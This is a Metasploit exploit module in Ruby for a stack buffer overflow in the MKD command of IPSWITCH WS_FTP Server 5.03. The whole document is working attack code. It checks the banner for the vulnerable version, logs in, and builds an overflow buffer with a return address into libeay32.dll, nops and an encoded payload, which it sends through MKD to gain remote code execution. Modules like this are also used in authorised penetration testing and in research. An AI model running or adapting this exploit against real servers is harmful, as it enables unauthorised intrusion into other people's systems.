require 'msf/core' module Msf class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote include Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'WS-FTP Server 5.03 MKD Overflow', 'Description' => %q{ This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin. }, 'Author' => [ 'ET LoWNOISE ', 'Reed Arvin ' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'BID', '11772'], [ 'MIL', '79'], ], 'Privileged' => false, 'Payload' => { 'Space' => 480, 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'WS-FTP Server 5.03 Universal', { 'Platform' => 'win', 'Ret' => 0x25185bb8, # Address is executable to allow XP and 2K # 0x25185bb8 = push esp, ret (libeay32.dll) # B85B1825XX = mov eax,0xXX25185b }, ], ], 'DisclosureDate' => 'Nov 29 2004', 'DefaultTarget' => 0)) end def check connect disconnect if (banner =~ /5\.0\.3/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect_login print_status("Trying target #{target.name}...") buf = Rex::Text.rand_text_alphanumeric(8192) buf[498, 4] = [ 0x7ffd3001 ].pack('V') buf[514, 4] = [ target.ret ].pack('V') buf[518, 4] = [ target.ret ].pack('V') buf[522, 2] = make_nops(2) buf[524, payload.encoded.length] = payload.encoded send_cmd( ['MKD', buf], true ); handler disconnect end end end